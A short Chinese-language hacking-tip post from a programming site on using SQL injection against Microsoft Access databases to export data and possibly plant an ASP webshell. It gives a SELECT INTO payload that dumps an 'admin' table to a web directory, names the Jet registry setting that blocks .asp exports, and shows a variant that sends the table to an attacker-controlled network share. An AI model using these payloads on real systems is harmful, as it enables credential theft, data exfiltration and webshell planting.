程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> Access數據庫 >> Access數據庫入門 >> SQL注入Access導出WebShell?

SQL注入Access導出WebShell?

編輯:Access數據庫入門

已經聽N個人過說有人已經發現SQL注入Access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。

最近在看的書中一章提到Jet的安全,然後靈光一閃,呵呵,發現了一種可以利用access導出asp的方法,分享之。

幾個月之前網上就流傳利用SQL注入Access導出數據庫內容到文本文件(可導出txt、htm、html等格式)的方法: 

SELECT * into [test.txt] in 'd:web' 'text;' from admin

執行上述語句,在d:web目錄下就會生成test.txt文件,其內容就是表admin的內容。但是導出asp格式就不行,會說“不能更新,數據庫或對象為只讀”。

其實控制導出文件後綴是存儲在注冊表的,具體鍵值是HKEY_LOCALMACHINESoftwareMicrosoftJet4.0EnginesTextDisableExtension,默認情況下值為“!txt,csv,tab,asc,tmp,htm,html”,如果我們把asp也添加進去的話,呵呵,就可以導出asp格式的文件了。

這個方法跟那個調用Access的Shell函數執行命令一樣,要修改注冊表,所以利用不是很大。

順便提一下,前面提到的導出文本文件的方法如果不知道web路徑貌似可以導出到自己機器的哦:SELECT * into [test.txt] in '\youripshare' 'text;' from admin

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved